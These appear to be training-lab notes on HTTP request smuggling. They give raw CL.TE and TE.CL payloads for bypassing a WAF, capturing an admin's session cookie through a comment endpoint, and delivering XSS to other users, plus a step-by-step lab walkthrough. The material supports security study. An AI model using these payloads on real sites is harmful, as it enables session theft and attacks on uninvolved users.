Exploitation Techniques

Overview

HTTP request smuggling vulnerabilities have high impact because they enable:

Attack Type	Impact
WAF Bypass	Access restricted paths/endpoints
Session Hijacking	Steal user cookies/tokens
Forced Actions	Make users perform unintended actions
Data Theft	Capture personal/sensitive data
XSS Amplification	Exploit otherwise unexploitable XSS

---

1. Bypassing Security Controls (WAFs)

How WAFs Work

WAFs examine:

• URL paths and query parameters

• Request headers

• Request body content

• Compute maliciousness scores

Blocking rules examples:

• Block requests to /internal/ from external IPs

• Block requests containing SQL injection patterns

• Block requests with XSS payloads

Why Smuggling Bypasses WAFs

WAF examines: Request URL, headers, visible body
Smuggled:     Hidden in body, parsed as separate request by back-end

The smuggled request is never treated as a query string by the WAF!

CL.TE WAF Bypass Payload

POST / HTTP/1.1
Host: vuln.htb
Content-Length: 64
Transfer-Encoding: chunked

0

POST /internal/index.php HTTP/1.1
Host: localhost
Dummy: 

WAF sees: POST to / (allowed) Back-end sees: POST to /internal/index.php (executed!)

TE.CL WAF Bypass Payload

GET / HTTP/1.1
Host: vuln.htb
Content-Length: 4
Transfer-Encoding: chunked

35
GET /internal/index.php HTTP/1.1
Host: localhost

0

WAF sees: GET to / (allowed) Back-end sees: GET to /internal/index.php (executed!)

---

2. Stealing User Data

The Technique

Force victims to submit their request data to a location you control (e.g., comment section, log file, API endpoint).

Scenario

• Web app has comment functionality

• Comments are publicly visible

• App is vulnerable to CL.TE

Comment POST Request (Normal)

POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Length: 43
Content-Type: application/x-www-form-urlencoded

name=htb-stdnt&comment=Hello+World%21

Data Stealing Payload

POST / HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Transfer-Encoding: chunked

0

POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

name=hacker&comment=test

What Happens

Admin's normal request:

GET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>

Back-end sees smuggled request + admin's request appended:

POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

name=hacker&comment=testGET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>

Result

The comment section now contains:

Hacker: testGET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>

Session cookie stolen! 🎯

---

TCP Stream Analysis - Data Theft

Reverse Proxy View

[Request 1: Our POST with smuggled comment request in body]
[Request 2: Admin's GET / with session cookie]

Web Server View

[Request 1: Our POST / - empty body after chunk terminator]
[Request 2: POST /comments.php with admin's request as comment parameter]

The smuggled request ends with comment=test - admin's entire request becomes the comment value!

---

Critical Considerations

Content-Length Tuning

The Content-Length in smuggled request is crucial:

CL Value	Result
Too small	Only partial data captured
Too large	Timeout waiting for more data
Just right	Full request captured

Strategy: Trial and error, start with ~300 and adjust.

Required Parameters

When smuggling authenticated actions, include:

• Your session cookie (Cookie header)

• CSRF tokens (if required)

• All mandatory form fields

Parameter Ordering

Place CSRF tokens at the beginning of smuggled body:

csrf=token123&name=hacker&comment=test

If CSRF is at the end, appended victim data may invalidate it.

---

Practical Exploitation Flow

Step 1: Confirm Vulnerability

Test for CL.TE with HELLO + 405 technique.

Step 2: Authenticate (if needed)

Log in to get valid session cookie and CSRF token.

Step 3: Identify Data Sink

Find where victim data can be captured:

• Comment sections

• Profile updates

• Log files

• API responses

Step 4: Craft Payload

POST / HTTP/1.1
Host: target.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Transfer-Encoding: chunked

0

POST /comments.php HTTP/1.1
Host: target.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
Cookie: PHPSESSID=<your_session>

csrf=<your_token>&name=Hacker&comment=Stolen:

Step 5: Send and Wait

1. Send smuggling request

2. Wait ~10 seconds for victim

3. Check data sink for captured data

Step 6: Use Stolen Credentials

Replace your cookie with victim's stolen cookie:

Developer Tools → Application → Cookies → Edit session value

---

3. Mass Exploitation of Reflected XSS

The Problem with Header-Based XSS

Reflected XSS in HTTP headers (e.g., Host, custom headers) is usually unexploitable:

GET / HTTP/1.1 
Host: vuln.htb
Vuln: "><script>alert(1)</script>

You cannot force a victim's browser to send custom headers!

Solution: Request Smuggling + XSS

Smuggle a request that injects XSS payload into victim's response.

XSS Exploitation Payload (CL.TE)

POST / HTTP/1.1
Host: vuln.htb
Content-Length: 63
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Vuln: "><script>alert(1)</script>
Dummy: 

What Happens

1. Our smuggled request with XSS in Vuln header left in buffer

2. Victim sends normal request

3. Victim's request merges with our smuggled request

4. Back-end processes request with XSS payload

5. Victim receives response containing XSS

6. XSS executes in victim's browser!

Attack Flow

Attacker                    Server                      Victim
   │                          │                           │
   │ Smuggle XSS payload      │                           │
   │─────────────────────────>│                           │
   │                          │                           │
   │                          │ XSS payload in buffer     │
   │                          │                           │
   │                          │      Normal GET /         │
   │                          │<──────────────────────────│
   │                          │                           │
   │                          │ Merges with XSS payload   │
   │                          │                           │
   │                          │   Response with XSS       │
   │                          │──────────────────────────>│
   │                          │                           │
   │                          │                    XSS EXECUTES!

Impact

• No user interaction required (unlike normal reflected XSS)

• Mass exploitation - affects all users visiting after your payload

• Exploit "unexploitable" header-based XSS vulnerabilities

---

Summary: Exploitation Matrix

Technique	Vulnerability Type	Goal	Payload Location
WAF Bypass	CL.TE / TE.CL	Access restricted paths	Smuggled URL
Data Theft	CL.TE	Steal cookies/tokens	Comment parameter
Forced Actions	CL.TE	Make user perform action	Smuggled request
XSS Amplification	CL.TE / TE.CL	Execute XSS on victims	Smuggled header

---

Lab Walkthrough Summary

Data Theft Scenario

1. Test for CL.TE vulnerability (HELLO + 405)

2. Authenticate with provided credentials

3. Post a test comment to capture the request format

4. Craft smuggling payload with comment endpoint

5. Send and wait for admin to visit

6. Check comments for leaked admin request

7. Extract session cookie from comment

8. Replace your cookie with admin's

9. Access admin panel

---

References

• PortSwigger - Exploiting HTTP Request Smuggling

• HTTP Desync Attacks - James Kettle

• Request Smuggling to XSS